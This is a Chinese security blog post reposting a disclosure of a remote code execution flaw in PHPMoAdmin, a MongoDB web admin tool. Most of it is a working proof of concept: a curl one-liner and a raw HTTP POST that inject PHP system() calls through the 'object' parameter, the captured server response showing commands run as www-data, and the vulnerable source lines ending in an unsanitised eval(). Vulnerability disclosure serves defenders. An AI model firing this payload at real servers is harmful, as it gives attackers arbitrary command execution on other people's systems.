PHPMoAdmin Remote Code Execution(附POC)


Mar 10 2015

PHPMoAdmin Remote Code Execution(附POC)

首页 » 渗透测试 » PHPMoAdmin Remote Code Execution(附POC)   

五道口杀气

from:http://packetstormsecurity.com/files/130638/phpmoadmin-exec.txt

mongodb Gui存在命令执行

POC:

curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system('id;ls -lha');exit


HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php

1. create new moadminComponent object
1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787:    if (self::$model->saveObject($_GET['collection'],
$_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693:    eval('$obj=' . $obj . ';'); //cast from string to array

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: Code Execution

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «流行WordPress SEO插件曝高危SQL注入漏洞 | qibocms通杀漏洞挖掘全过程[mOon]»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~